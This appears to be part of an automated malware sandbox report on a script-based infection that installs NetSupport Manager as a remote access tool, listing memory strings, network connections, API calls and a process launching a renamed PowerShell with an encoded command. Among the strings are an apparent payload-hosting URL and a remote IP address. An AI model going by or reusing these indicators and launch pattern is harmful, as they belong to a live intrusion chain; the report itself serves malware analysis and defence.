                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://sv.symcd.com0&
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.acer-group.com/public/index/privacy.htm%scountry.dat
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: client32.exe, 00000028.00000002.2763417509.0000000005BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/auto
                                Source: client32.exe, 00000028.00000002.2765669565.0000000007A47000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2809017512.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2809017512.0000000005A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://www.flexerasoftware.com0
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.google.com
                                Source: pcicfgui_client.exe, 00000024.00000002.2676926399.000000006B559000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.idk.co.jp
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.intel.com/support/eduhttp://www.hp.com/go/hpclassroommanagerpEventDatam_pExhibitingm_pExh
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co-
                                Source: wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615789024.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615749480.0000000002680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: winst64.exe, 00000021.00000002.2616022842.00007FF778F25000.00000004.00000001.01000000.0000000F.sdmp, pcicfgui_client.exe, 00000024.00000002.2676556252.000000006A98E000.00000004.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp111
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000015.00000003.2484140065.000000000309A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                Source: msiexec.exe, 00000015.00000003.2484064535.000000000309F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000015.00000003.2485726143.000000000308C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com/support
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESU
                                Source: msiexec.exe, 00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.comm
                                Source: wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615789024.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615749480.0000000002680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, checkdvd.exe, 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, MSI3FCC.tmp, 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, winst64.exe, 00000021.00000000.2613701112.00007FF778F25000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2616022842.00007FF778F25000.00000004.00000001.01000000.0000000F.sdmp, MSI51C1.tmp, 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, pcicfgui_client.exe, 00000024.00000002.2676316225.000000006A967000.00000004.00000001.01000000.0000001F.sdmp, pcicfgui_client.exe, 00000024.00000002.2676556252.000000006A98E000.00000004.00000001.01000000.0000001F.sdmp, client32.exe, 
00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://activate.netsupportsoftware.com/update
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://activate.netsupportsoftware.com/update/?s=%s?s=1234%s5678noactlc
                                Source: wscript.exe, 00000000.00000002.1750132291.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718074541.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719233043.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3ks
                                Source: wscript.exe, 00000000.00000002.1750132291.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718074541.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719233043.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drString found in binary or memory: https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.h
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://netsupportschool.com/whats_newAn
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1882351312.000000000B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://okolinabeauty.com/
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1882351312.000000000B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://okolinabeauty.com/choh/Client32.ini
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSe
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp, Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, checkdvd.exe, 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, MSI3FCC.tmp, 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, winst64.exe, 00000021.00000000.2613701112.00007FF778F25000.00000008.00000001.01000000.0000000F.sdmp, MSI51C1.tmp, 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, pcicfgui_client.exe, 00000024.00000002.2676316225.000000006A967000.00000004.00000001.01000000.0000001F.sdmp, PCICL32.DLL.22.drString found in binary or memory: https://www.netsupportschool.com/ios-android/111
                                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
                                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
                                Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
                                Source: unknown HTTPS traffic detected: 176.126.113.166:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: C:\Windows\Installer\MSI264F.tmp Code function: 28_2_00B16A30 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,28_2_00B16A30
                                Source: C:\Windows\Installer\MSI2BE4.tmp Code function: 30_2_00486A30 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,30_2_00486A30
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Code function: 31_2_00E93FC0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,31_2_00E93FC0
                                Source: C:\Windows\Installer\MSI3FCC.tmp Code function: 32_2_001A6A30 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,32_2_001A6A30
                                Source: client32.exe, 00000028.00000002.2770498000.000000006F91A000.00000002.00000001.01000000.00000020.sdmp Binary or memory string: RegisterRawInputDevicesmemstr_ba398b6d-6
                                Source: C:\Windows\Installer\MSI264F.tmp Code function: 28_2_00B2F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,28_2_00B2F030
                                Source: C:\Windows\Installer\MSI264F.tmp Code function: 28_2_00B2F225 __wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,28_2_00B2F225
                                Source: C:\Windows\Installer\MSI2BE4.tmp Code function: 30_2_0049F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,30_2_0049F030
                                Source: C:\Windows\Installer\MSI2BE4.tmp Code function: 30_2_0049F225 __wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,30_2_0049F225
                                Source: C:\Windows\Installer\MSI3FCC.tmp Code function: 32_2_001BF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,_wcsrchr,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,32_2_001BF030
                                Source: C:\Windows\Installer\MSI3FCC.tmp Code function: 32_2_001BF225 _wcsrchr,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,32_2_001BF225

                                E-Banking Fraud

                                Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc 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

                                Spam, unwanted Advertisements and Ransom Demands

